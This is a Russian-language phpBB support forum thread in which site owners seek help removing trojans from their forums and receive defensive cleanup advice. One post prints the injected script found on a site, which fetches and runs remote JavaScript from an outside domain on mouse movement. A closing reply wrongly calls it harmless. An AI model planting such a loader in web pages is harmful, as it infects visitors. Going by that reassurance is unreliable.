Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение

-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- Former team member
- Сообщения: 1008
- Стаж: 18 лет 9 месяцев
- Откуда: Кишинёв
- Благодарил (а): 1 раз
Re: Как убить Трояна?
Пока вирус на компе, меняй пароли, не меняй - все одно.max755 писал(а):Уже и пароли на всё сменил, не помогает.
ФТП доступ только у вас?
-
- phpBB 1.0.0
- Сообщения: 9
- Стаж: 14 лет 7 месяцев
- Забанен: Бессрочно
Re: Как убить Трояна?
Надеюсь, что только у меня.DK7 писал(а):ФТП доступ только у вас?
Сейчас провожу повторную проверку антивирусом.DK7 писал(а):Пока вирус на компе, меняй пароли, не меняй - все одно.
-
- Former team member
- Сообщения: 1008
- Стаж: 18 лет 9 месяцев
- Откуда: Кишинёв
- Благодарил (а): 1 раз
Re: Как убить Трояна?
Тут могут быть сотни нюансов. Вирус может быть где угодно, на флешке и постоянно инфицировать компьютер, а может быть сам хостер инфицирован.
Пользуйтесь простой штукой, которая однако очень помогает.
Когда будете сохранять пароль в программу для доступа к фтп, то вводите на 1 лишний символ в конце больше. При залогинивании , программа напишет что пароль неверен. И попросит заново ввести его. Бекспейсом забиваете последний символ и спокойно заходите. Червь же окажется в пролете.
Пользуйтесь простой штукой, которая однако очень помогает.
Когда будете сохранять пароль в программу для доступа к фтп, то вводите на 1 лишний символ в конце больше. При залогинивании , программа напишет что пароль неверен. И попросит заново ввести его. Бекспейсом забиваете последний символ и спокойно заходите. Червь же окажется в пролете.
-
- Former team member
- Сообщения: 12113
- Стаж: 18 лет 2 месяца
- Откуда: Калининград не Кенигсберг
- Благодарил (а): 36 раз
- Поблагодарили: 1526 раз
Re: Как убить Трояна?
Тогда ставь Аваст и после установки запланируй "Проверку во время загрузки"max755 писал(а):Я уже проверял и Куреитом и Касперским, AVZ и HJT
Добавлено спустя 2 минуты 59 секунд:
Выложи лог HJTmax755 писал(а):HJT - ничего...
-
- phpBB 1.4.0
- Сообщения: 38
- Стаж: 14 лет 2 месяца
Re: Как убить Трояна?
Помогите убрать Trojan Downloader.HackLoad.AG
У меня стоит еще 2.0.x версия форума. (не знаю, как уточнить, доступа в админку нет из-за активности антивиря, отключение его что-то не помогло)
Удалил подозрительную картинку картинку, выкачал с фтп все файлы и проверил НОДом, ничего не нашлось. Ифреймов подозрительных не видно.
Как обезвредить?
Спасибо
У меня стоит еще 2.0.x версия форума. (не знаю, как уточнить, доступа в админку нет из-за активности антивиря, отключение его что-то не помогло)
Удалил подозрительную картинку картинку, выкачал с фтп все файлы и проверил НОДом, ничего не нашлось. Ифреймов подозрительных не видно.
Как обезвредить?
Спасибо
Код: Выделить всё
clubcaptiva.ru/forum/
-
- Former team member
- Сообщения: 2616
- Стаж: 19 лет 8 месяцев
- Откуда: Новосибирск
- Поблагодарили: 3 раза
Re: Как убить Трояна?
AntikMan
на каких страницах ругается антивирь?
на каких страницах ругается антивирь?
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
-
- phpBB 1.4.0
- Сообщения: 38
- Стаж: 14 лет 2 месяца
-
- Former team member
- Сообщения: 2616
- Стаж: 19 лет 8 месяцев
- Откуда: Новосибирск
- Поблагодарили: 3 раза
Re: Как убить Трояна?
AntikMan
что у вас за антивирь? И еще сделайте на всякий случай скриншот его ругани, возможно это поможет разобраться, где засел гад.
что у вас за антивирь? И еще сделайте на всякий случай скриншот его ругани, возможно это поможет разобраться, где засел гад.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
-
- phpBB 2.0.0
- Сообщения: 244
- Стаж: 18 лет 5 месяцев
- Откуда: НСО, п. Витаминка
- Благодарил (а): 3 раза
- Поблагодарили: 2 раза
Re: Как убить Трояна?
AntikMan, ведь тебе ответил в твоей предыдущей теме.
Какая точно стоит версия форума, какие моды установлены?
Вредоносный код обычно прописан в index.php, в файлах шаблона *.tpl (main.tpl). Код содержится в тегах <iframe>, <script>, иногда <script src=\...> в базе данных.
В папке с картинками возможно находятся shell'ы (файлы php), которые закодированы различными функциями. Смотреть и проверять нужно все.
Какая точно стоит версия форума, какие моды установлены?
Вредоносный код обычно прописан в index.php, в файлах шаблона *.tpl (main.tpl). Код содержится в тегах <iframe>, <script>, иногда <script src=\...> в базе данных.
В папке с картинками возможно находятся shell'ы (файлы php), которые закодированы различными функциями. Смотреть и проверять нужно все.
-
- phpBB 1.4.0
- Сообщения: 36
- Стаж: 14 лет 1 месяц
- Откуда: Киев
Re: Как убить Трояна?
Последний раз редактировалось kusto 31.03.2011 14:33, всего редактировалось 1 раз.
-
- phpBB 1.4.0
- Сообщения: 36
- Стаж: 14 лет 1 месяц
- Откуда: Киев
Re: Как убить Трояна?
наконец-то нашел.. по ходу такой вот код:
может кому интересно будет
всем сапсибо за содействие
Код: Выделить всё
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
всем сапсибо за содействие
-
- Former team member
- Сообщения: 2616
- Стаж: 19 лет 8 месяцев
- Откуда: Новосибирск
- Поблагодарили: 3 раза
Re: Как убить Трояна?
MAzZY
вообще, довольно подозрительный код. Но не факт, что кроме него ничего нет.
вообще, довольно подозрительный код. Но не факт, что кроме него ничего нет.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
-
- Former team member
- Сообщения: 1687
- Стаж: 14 лет 4 месяца
- Откуда: KZN
- Благодарил (а): 4 раза
- Поблагодарили: 11 раз
Re: Как убить Трояна?
Alek$, этот код ссылается на сайт гугла. Вряд ли Гугл распространяет вирусы...
In Web We Trust